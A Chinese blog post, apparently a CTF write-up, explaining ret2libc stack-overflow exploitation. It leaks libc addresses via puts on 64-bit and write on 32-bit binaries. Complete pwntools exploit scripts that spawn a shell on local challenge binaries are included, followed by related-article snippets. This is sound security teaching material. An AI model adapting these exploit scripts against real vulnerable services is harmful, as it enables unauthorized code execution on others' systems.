关于ret2libc 的泄露 puts(64位)+write(32位)

已于 2024-04-05 21:56:24 修改
阅读量1k 收藏 13
点赞数 11
文章标签: javascript 前端 开发语言
于 2024-04-05 21:53:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuo1358/article/details/137249251
版权

目录

puts64位

write(32位)

原理:在程序运行中,当函数运行过一次之后,会将函数的地址存在got表中,我们可以利用输出函数对函数地址进行泄露

puts64位

题目

基础检查,只有NX保护

丢入ida

第二个read 明显存在栈溢出

寻找system

发现找不到system 和binsh

也没有flag的字符,初步认为要泄露libc

接下来开始payload的构造

注意64位要用寄存器来传参

用ROR-gadget寻找合适的寄存器

泄露出read的真实地址

payload=b'a'*120+p64(0x400823)+p64(read_got)+p64(puts_plt)+p64(main)

 下面是接收数据

read=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
#read=u64(io.recv(6).ljust(8,b'\x00'))

#主要使用第一个,第二个有数据干扰

#第一个的原理是我们的地址都是'\x7f'开头的,使用只有遇到'\x7f'才会开始接收

接下俩找libc版本又两种方法

一个是去下面网站寻找

LibcSearcher

另一种方法是安装LibcSearcher的库

下面是安装教程

LibcSearcher安装

我使用的是第二种方法

泄露出地址之后开始寻找版本

#LibcSearcher的使用示例
libc=LibcSearcher('read',read)
libc_base=read-libc.dump('read')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

选择正确的版本

最后再进行一次溢出

payload=b'a'*120+p64(0x40057e)+p64(0x400823)+p64(bin_sh_addr)+p64(system_addr)+p64(0xdeadbeef)

这里还要注意栈对齐,要用寄存器多绕一步来维持栈平衡

最后运行

最终exp

from pwn import*
from LibcSearcher import LibcSearcher
context.log_level='debug'
io=process('./libc')
elf=ELF('./libc')
read_got=elf.got['read']
puts_plt=elf.plt['puts']
main=elf.sym['main']
io.recvuntil("Hacker,What's your name?")
io.sendline('2')
payload=b'a'*120+p64(0x400823)+p64(read_got)+p64(puts_plt)+p64(main)
io.recvuntil("then let's begin!\n")
io.sendline(payload)
read=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print("the read really address\n")
print(hex(read))
libc=LibcSearcher('read',read)
libc_base=read-libc.dump('read')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
io.send('2')
payload=b'a'*120+p64(0x40057e)+p64(0x400823)+p64(bin_sh_addr)+p64(system_addr)+p64(0xdeadbeef)
io.recvuntil("then let's begin!\n")
io.sendline(payload)
io.interactive()

这里提醒一下读者,一定要注意数据的接收顺序来编写recvuntil,笔者在这里卡了好久

write(32位)

基础检查

题目

基础检擦,保护基本没开

丢入ida

很简单  read 函数存在明显的栈溢出

同样还是找不到system 也没有flag等字符

初步认为是libc 泄露

那么可以运用write函数来泄露got表

在ida中找到返回函数

使用payload1的构造为

payload =b'a'*140+p32(write)+p32(0x80483f4)+p32(1)+p32(read)+p32(4)

这里要注意write函数要传入三个参数

ssize_t write(int fd,const void*buf,size_t count);
参数说明:
  fd:是文件描述符(write所对应的是写,即就是1)
  buf:通常是一个字符串,需要写入的字符串
  count:是每次写入的字节数

地址泄露后开始找libc

这次我选择用第一种方法

找到对应地址

开始找算偏移和构造system和binsh 的地址

base=read_got-0x10a840
system=base+0x04c880
binsh=base+0x1b5fc8

最后再进行一次 栈溢出

payload=b'a'*140+p32(system)+p32(0)+p32(binsh)

运行exp

 

最终exp

from pwn import *
from LibcSearcher import LibcSearcher
sh=process('./123')
elf=ELF('./123')
read=elf.got['read']
write=elf.plt['write']

payload =b'a'*140+p32(write)+p32(0x80483f4)+p32(1)+p32(read)+p32(4)
sh.send(payload)
read_got=u32(sh.recv())
print("the read of address :",hex(read_got))

base=read_got-0x10a840
system=base+0x04c880
binsh=base+0x1b5fc8
payload=b'a'*140+p32(system)+p32(0)+p32(binsh)
sh.send(payload)
sh.interactive()

 笔者纯小白,有错误还望指出

「已注销」
关注
pwn-ret2libc基础
admin的博客
10-04 971
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
PWN基础17:Ret2Libc 64位实例
prettyX的博客
07-24 4521
复现一下Ret2Libc 32位下的内存布局 针对这张图,我们在上一节做了细致的分析 32位的调用方式 32位系统中调用函数的方式:栈传递参数 构造函数调用将参数和返回地址放在栈上 构造执行write(1,buf2,20)后,再返回main函数 64位的调用方式 64位系统中使用寄存器传递参数:rdi、rsi、rdx、rcx、r8、r9(1-6个参数) 这节课,我们研究的源码 #include <stdio.h> char buf2[10]="ret2libc is goo
64位linux系统:栈溢出+ret2libc ROP attack
weixin_34232363的博客
06-03 916
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
CTFShow pwn07 (ret2libc-64bit
Mintind的博客
12-03 1220
CTFShow pwn07解题记录
【HUST】信息系统安全:系统调用介入作业,安全策略制定,编写简单的64位ret2libc攻击程序
weixin_45695828的博客
05-21 1394
本次实验内容: 针对第一次作业的代码,利用seccomp方法进行对程序进行约束,使得attacker只能将/tmp/flag的内容,向标准输出(STDOUT )进行输出,且只能输出 32 bytes的内容。 要求: 1. 实现上述约束方法; 2. 通过attack,验证上述约束方法的效果,attack包括:1)调用system函数创建shell(或直接调用execve,或调用其它系统调用);2)向其它目标输出内容(如:STDERR)、输出长度调整(超过32 bytes)。 虽然说...
ciscn_2019_en_2 ret2libc64
pondzhang的专栏
05-02 313
from pwn import * elf = ELF('./libc-2.23.so') p = process("./ciscn_2019_en_2") p.recvuntil('choice!\n') p.sendline("1") p.recvuntil('encrypted\n') poprdiret = 0x0000000000400c83 pltputs = 0x0000000000...
PWN基础16:Ret2Libc 32位实例
prettyX的博客
07-21 1140
这节我们研究的源码 //L16.c #include <stdio.h> char buf2[10]="ret2libc is good"; void vul() { char buf[10]; gets(buf); } void main() { write(1,"hello",5); vul(); }
ret2libc实战
xia0ji233
05-17 437
title: ret2libc实战 date: 2021-05-13 22:00:00 tags: binary security study report ret2libc comments: true categories: ctf pwn ret2libc是一个pwner必备的基础知识。 ret2libc为return to libc的缩写,我们需要执行libc函数里面的system("/bin/sh") 下面为32位程序并且带.so文件的题目:buuctf[OGeek2019]babyrop.
pwn ret2libc
清霂的博客
02-04 518
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
华科信息系统安全作业: 利用ret2libc实现控制流劫持
finelaoy的博客
04-21 673
记录信息系统安全的一次利用ret2libc作业
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 5109
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
最新发布
Bossfrank的博客
12-08 8442
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位64位的两个具体题目具体的介绍了解pwn题的完整过程。
什么是代码重定位
weixin_46089486的博客
10-09 706
ARM体系结构-代码重定位 一、为什么会有重定位 1、程序的运行过程就是CPU不断的从内存中取出指令,然后执行指令的过程。 2、那么CPU是如何从内存中去去这些指令的呢?当然是通过内存地址来获取。 3、以前使用单片机时,没有仔细思考过这个问题,都是认为程序是烧写到芯片内部的flash中的,也没有仔细思考过,程序是怎么跳转到flash取指令并执行的。 4、对于嵌入式系统来说,它的程序可能会比较大,超出它内部的flash大小,我们的程序无法整个放入到芯片内部的flash中;甚至有些SoC芯片内部根本就没有fla
PWN篇:ret2libc
weixin_44644249的博客
01-28 477
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
PWN题型之Ret2Libc
swedsn
03-18 4890
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
pwn学习之ret2libc
weixin_43800829的博客
02-16 1324
title: pwn学习之ret2libc date: 2020-01-29 18:07:07 tags: pwn学习 在家无聊了的第二天,继续学习pwn的知识 ​ 今天看了看wiki-ret2libc的内容,觉得受益匪浅。 原理 ​ ret2libc说白了就是让我们之前的ret不往shellcode或者vul上跳 而是跳到了某个函数的plt或者got的位置 从而实现控制程序的函数去执行li...
利用puts函数泄露libc内存信息
zszcr的博客
03-22 3149
puts函数puts的原型是puts(addr),即将addr作为起始地址输出字符串,直到遇到“x00”字符为止。也就是说,puts函数输出的数据长度是不受控的,只要我们输出的信息中包含x00截断符,输出就会终止,且会自动将“n”追加到输出字符串的末尾,这是puts函数的缺点,而优点就是需要的参数少,只有1个,无论在x86还是x64环境下,都容易调用。为了克服输入不受控这一缺点,我们考虑利用put...
puts函数泄露地址
Sakura给爷pwn全场
12-17 1001
CTF中的PWN——绕CANARY防护3(选择项+PUTS带出CANARY+泄露函数地址计算基地址): https://www.freesion.com/article/5901691025/ 利用puts函数泄露libc内存信息: https://www.it610.com/article/1296102748638486528.htm
puts函数
06-02
`puts` 函数是C语言标准库中用于向标准输出(通常是控制台)输出一个字符串的函数。其函数原型如下: ```c int puts(const char* str); ``` 其中str参数是一个C字符串(以NULL结尾的字符数组),表示要输出的内容。例如: ```c puts("Hello, world!"); ``` 这将输出字符串 "Hello, world!" 到标准输出。 `puts` 函数会自动在输出内容末尾添加一个换行符,并将输出的字符串作为一个完整的行输出。如果输出成功,该函数返回一个非负整数,否则返回 EOF。 需要注意的是,`puts` 函数并不支持格式化输出,如果你需要对输出进行格式化,请使用 `printf` 函数。另外,`puts` 函数会自动将字符串输出到标准输出,如果你需要将字符串输出到文件或其他设备,请使用 `fprintf` 函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值